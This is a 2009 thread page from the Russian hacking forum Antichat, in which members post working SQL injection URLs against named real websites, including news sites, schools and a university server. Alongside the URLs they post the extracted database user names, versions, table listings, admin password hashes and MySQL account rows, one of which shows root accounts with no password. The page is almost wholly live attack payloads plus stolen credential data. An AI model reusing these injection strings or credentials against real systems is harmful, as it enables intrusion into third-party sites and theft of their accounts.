ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #9661  
Старый 04.06.2009, 14:31
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Специально для Турков чтобы она не брали чужие хаки и не писали что их страна великая и там супер хакеры, пускай свои ломают сайты, точней доламывают )))

Цитата:
http://www.koomik.com/cizgifilm.php?id=-11+UNION+SELECT+0,concat_ws(0x0b,user(),version(), data base()),2,3,4&q=eminem+vs+noel+day%C4%B1
maxoyun@localhost
5.0.33-log
maxoyun

Таблы
Цитата:
http://www.koomik.com/cizgifilm.php?id=-11+UNION+SELECT+0,concat_ws(0x0b,table_name,colum n_name),2,3,4+FROM+INFORMATION_SCHEMA.COLUMNS+LIMI T+267,1&q=eminem+vs+noel+day%C4%B1

Цитата:
http://www.iumezusa.org/docView.php?id=675+UNION+SELECT+0,1,2,3,4,concat_w s(0x0b,u ser(),version(),database()),6,7,8,9,10,11,12,13,14 ,15,16,17,18
iumezusa_web@boscgi1703.eigbox.net
5.0.51a-log
iumezusa_iumezusa

Мемберы
Цитата:
http://www.iumezusa.org/docView.php?id=675+UNION+SELECT+0,1,2,3,4,concat_w s(0x0b,table_name,c olumn_name),6,7,8,9,10,11,12,13,14,15,16,17,18+FRO M+INFORMATION_SCHEMA.COLUMNS+LIMIT+230,1

Цитата:
http://www.bolgegazetesi.com/haber_goster.php?id=-841/**/UNION/**/SELECT/**/0,1,concat_ws(0x0b,use r(),version(),database()),3,4,5,6,7,8,9
malatya__malatya@localhost
4.1.18-nt-max
malatya__malatya


Цитата:
http://www.abhaber.com/haber.php?id=-21080+UNION+SELECT+0,1,concat_ws(0x0b,user(),versi on(),databa se()),3,4,5,6,7
abhaber_root@localhost
5.0.67-community-log
abhaber_abhaber


Цитата:
http://www.gazeteodtulu.com/eskigazete/haberler.php?id=1322+UNION+SELECT+0,1,2,concat_ws( 0x0b,u ser(),version(),database()),4,5,6,7,8,9,10+LIMIT+1 ,1
godtu_user@localhost
5.1.30-log
godtu_godtu


Цитата:
http://www.otodefteri.com/haberbak.php?id=-171+UNION+SELECT+0,1,2,3,4,CONCAT_WS(0x0B,USE R(),VERSION(),DATABASE()),6,7,8,9,10,11,12,13,14,1 5
root@localhost
5.0.32-Debian_7etch3-log
otodefteri
 
Ответить с цитированием

  #9662  
Старый 04.06.2009, 14:32
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.goldbio.com/seminar.php?seminarId=-13+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ ws(0x3a,version(),user(),database())
4.1.22:goldbiouser@localhost:GoldBio



http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5/*
5.0.45:root@localhost:events
мммм, как сладко

Вытаскиваем:
http://lammp.bli.uci.edu/seminar.php?mode=abstract&id=-329+union+select+1,2,concat_ws(0x3a,user,password, host),4,5+from+mysql.user/*

root::localhost
root::webhost.bli.uci.edu
root::127.0.0.1
ntroiwikiadmin:*8B8A4BCE24C00513D82A6DE18A58DD80DF B1E993:localhost
vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742 F0:%
vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742 F0:localhost
vpwikiuser:*0E2172CA358B9492A4D030BF3D06DF4EE75742 F0:localhost.localdomain


неплохо, root Без пароля, под vpwikiuser тоже множно подключиться откуда угодно
 
Ответить с цитированием

PR6
  #9663  
Старый 04.06.2009, 14:54
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию PR6

http://www.whathaseuropedone.eu/event_detail.php?event_id=-227'+union+select+1,2,3,concat_ws(0x3a,version(),d atabase(),useR(),@@version_compile_os),5,6,7,8,9,1 0,11,12,13,14,15,16,17,18,19/*


Database Version: 4.1.15-standard
Database name: whateurope_1
User name: whatadmin@localhost
Os : pc-linux-gnu
 
Ответить с цитированием

  #9664  
Старый 04.06.2009, 14:57
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

ttp://www.agira.ru/school.php?serv=2+and+substring(version(),1,1)=4
ТИЦ 40



http://www.sschouston.org/school.php?sview=-35+union+select+concat_ws(0x3a,version(),user
(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14
5.0.67.d7-ourdelta-log:sscdata@72.167.183.42:sscdata

таблицы
http://www.sschouston.org/school.php?sview=-35+union+select+table_name,2,3,4,5,6,7,8,9,10,11,1 2,13,14+from+information_schema.tables

users(id,username,password)
http://www.sschouston.org/school.php?sview=-35+union+select+concat_ws
(0x3a,id,username,password),2,3,4,5,6,7,8,9,10,11, 12,13,14+from+users

1:member:268184C12DF027F536154D099D497B31

PR 2

Вход: http://www.sschouston.org/login.php

----------------

http://www.natronaschools.org/school.php?id=-57+union+select+1,concat_ws(0x3a,version(),user
(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,3
6,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52, 53,54,55,56,57
4.1.22-log:adbay@localhost:school_db

PR 4

------------

третий мускуль
http://dcrush.obninsk.ru/school.php?id_p=1+and+substring(version(),1,1)=3
 
Ответить с цитированием

  #9665  
Старый 04.06.2009, 15:39
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://skivacationhouse.com/index.php?custom_language=turkish&user=detaliespop upcondrent&pid=1%20AND%201=0%20%75%6E%69%6F%6E%20S ELECT%201,concat_ws(0x3e,user,password,email),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17%20FROM%20admin--

admin>49ba6d17550da5f53c5e5c8b741c1993> (PID: 1)

http://www.vivavilla.nl/index.php?custom_language=turkish&user=detaliespop upcondrent&pid=1%20AND%201=0%20%75%6E%69%6F%6E%20S ELECT%201,concat_ws(0x3e,user,password,email),3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17%20FROM%20admin--

admin>c2e4327c0ed6d23227be395b77b0272e> (PID: 1)
 
Ответить с цитированием

  #9666  
Старый 04.06.2009, 15:39
AlexSatter
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
Провел на форуме:
1168802

Репутация: 298
По умолчанию

http://www.cds.edu/php/facultyProfile.php?categoryId=162+and+substring(ve rsion(),1,1)=5

PR 6

-------

http://briz-info.com/sanatorium.php?p=1+and+substring(version(),1,1)=5

Последний раз редактировалось AlexSatter; 04.06.2009 в 15:45..
 
Ответить с цитированием

  #9667  
Старый 04.06.2009, 15:54
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

[B]http://www.city.vbg.ru/index.php?id=-566%20union%20select%201,2,version(),4,5,6,7,8/*

4.0.12

Последний раз редактировалось jokester; 04.06.2009 в 17:17.. Причина: xoxox.ru regenwald.org ktpae.gr БОЯНы
 
Ответить с цитированием

  #9668  
Старый 04.06.2009, 16:05
udman
Постоянный
Регистрация: 21.04.2009
Сообщений: 321
Провел на форуме:
785842

Репутация: 239
По умолчанию

Цитата:
http://hor.sao.mos.ru/news.php?cat=-1+UNION+SELECT+0,1,concat_ws(0xb,0xb,user(),versio n(),data base(),0x0b)+/*
sao@chicken
4.1.12
sao


Kimliksiz
а теперь на русский плиз

сорри за оффтоп, потом кильну мессагу
 
Ответить с цитированием

  #9669  
Старый 04.06.2009, 16:16
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

Ebs

http://www.site.com

Последний раз редактировалось Kimliksiz; 01.07.2009 в 16:06..
 
Ответить с цитированием

  #9670  
Старый 04.06.2009, 16:51
Kimliksiz
Познающий
Регистрация: 07.05.2009
Сообщений: 31
Провел на форуме:
137000

Репутация: 96
По умолчанию

http://www.shtypidites.com/lajmet.php?id=540+and+1=2+union+all+select+1,2,3,4 ,5,concat(emri,char(58),fjalkalimi)+from+admin/*

http://www.tifozatkuqezi.com/sporti-lajme.php?id=3856+and+1=2+union+all+select+1,2,3,4 ,5,concat(user,char(58),pass),7,8,9,10,11,12+from+ cube_store_con fig/*

Последний раз редактировалось jokester; 04.06.2009 в 17:19.. Причина: management.com.ua БОЯН
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ